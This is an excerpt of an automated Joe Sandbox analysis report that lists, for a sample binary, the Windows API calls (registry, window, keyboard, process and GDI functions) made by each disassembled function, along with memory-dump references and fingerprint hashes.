                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                      • String ID:
                                      • API String ID: 4082120231-0
                                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                      • String ID:
                                      • API String ID: 2027346449-0
                                      • Opcode ID: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                      • Opcode Fuzzy Hash: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • GetMenu.USER32 ref: 0047A703
                                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                      • _wcslen.LIBCMT ref: 0047A79E
                                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                      • String ID:
                                      • API String ID: 3257027151-0
                                      • Opcode ID: 593a3109556d9b21452c25584920ed9ff9da066780f75faca70946367d94fd10
                                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                      • Opcode Fuzzy Hash: 593a3109556d9b21452c25584920ed9ff9da066780f75faca70946367d94fd10
                                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                      APIs
                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLastselect
                                      • String ID:
                                      • API String ID: 215497628-0
                                      • Opcode ID: 32016d442942c99cb5d1d8051373ec334af97d98cdfb278eec92297a0a11cd61
                                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                      • Opcode Fuzzy Hash: 32016d442942c99cb5d1d8051373ec334af97d98cdfb278eec92297a0a11cd61
                                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                      APIs
                                      • GetParent.USER32(?), ref: 0044443B
                                      • GetKeyboardState.USER32(?), ref: 00444450
                                      • SetKeyboardState.USER32(?), ref: 004444A4
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                      • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                      • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                      • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                      APIs
                                      • GetParent.USER32(?), ref: 00444633
                                      • GetKeyboardState.USER32(?), ref: 00444648
                                      • SetKeyboardState.USER32(?), ref: 0044469C
                                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                      • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                      • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                      • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                      APIs
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                      • String ID:
                                      • API String ID: 2354583917-0
                                      • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                      • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                      • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                      • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                      • __wsplitpath.LIBCMT ref: 00475644
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcscat.LIBCMT ref: 00475657
                                      • __wcsicoll.LIBCMT ref: 0047567B
                                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                      • String ID:
                                      • API String ID: 2547909840-0
                                      • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                      • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                      • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                      • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                      • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                      • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                      • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                      APIs
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                      Similarity
                                      • API ID: Window$Enable$Show$MessageMoveSend
                                      • String ID:
                                      • API String ID: 896007046-0
                                      • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                      • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                      • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                      • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                      • __swprintf.LIBCMT ref: 0045D4E9
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu$\VH
                                      • API String ID: 3164766367-2432546070
                                      • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                      • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                      • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                      • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                      APIs
                                      • _malloc.LIBCMT ref: 0041F707
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • _free.LIBCMT ref: 0041F71A
                                      Strings
                                      Similarity
                                      • API ID: AllocateHeap_free_malloc
                                      • String ID: [B
                                      • API String ID: 1020059152-632041663
                                      • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                      • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004302E6
                                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                                      • GetClientRect.USER32(?,?), ref: 00430364
                                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                      • GetWindowRect.USER32(?,?), ref: 004303C3
                                      • ScreenToClient.USER32(?,?), ref: 004303EC
                                      Similarity
                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                      • String ID:
                                      • API String ID: 3220332590-0
                                      • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                      • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                      • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                      • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                      APIs
                                      Similarity
                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                      • String ID:
                                      • API String ID: 1612042205-0
                                      • Opcode ID: 406a88ac02121889f2cd88f524cf302c7b9e45acb5ab804a65c54a6be80a4228
                                      • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                      • Opcode Fuzzy Hash: 406a88ac02121889f2cd88f524cf302c7b9e45acb5ab804a65c54a6be80a4228
                                      • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _memmove_strncmp
                                      • String ID: >$U$\
                                      • API String ID: 2666721431-237099441
                                      • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                      • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                      • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                      • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044C570
                                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$InputSend
                                      • String ID:
                                      • API String ID: 2221674350-0
                                      • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                      • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                      • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                      • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                      APIs
                                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                      Similarity
                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                      • String ID:
                                      • API String ID: 1976402638-0
                                      • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                      • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                      • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                      • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                      • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                      • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                      • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                      APIs
                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                      Similarity
                                      • API ID: Window$Enable$Show$MessageSend
                                      • String ID:
                                      • API String ID: 1871949834-0
                                      • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                      • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                      • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                      • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                      • SendMessageW.USER32 ref: 00471AE3
                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                      Similarity
                                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                      • String ID:
                                      • API String ID: 3611059338-0
                                      Similarity
                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                      • String ID:
                                      • API String ID: 1640429340-0
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • _wcslen.LIBCMT ref: 004438CD
                                      • _wcslen.LIBCMT ref: 004438E6
                                      • _wcstok.LIBCMT ref: 004438F8
                                      • _wcslen.LIBCMT ref: 0044390C
                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                      • _wcstok.LIBCMT ref: 00443931
                                      Similarity
                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                      • String ID:
                                      • API String ID: 3632110297-0
                                      Similarity
                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                      • String ID:
                                      • API String ID: 752480666-0
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                      • String ID:
                                      • API String ID: 3275902921-0
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                      • String ID:
                                      • API String ID: 3275902921-0
                                      APIs
                                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      APIs
                                      • SendMessageW.USER32 ref: 004555C7
                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Similarity
                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                      • String ID:
                                      • API String ID: 3691411573-0
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                      • LineTo.GDI32(?,?,?), ref: 004472AC
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                      • LineTo.GDI32(?,?,?), ref: 004472C6
                                      • EndPath.GDI32(?), ref: 004472D6
                                      • StrokePath.GDI32(?), ref: 004472E4
                                      Similarity
                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                      • String ID:
                                      • API String ID: 372113273-0
                                      APIs
                                      • __getptd.LIBCMT ref: 0041708E
                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                      • __amsg_exit.LIBCMT ref: 004170AE
                                      • __lock.LIBCMT ref: 004170BE
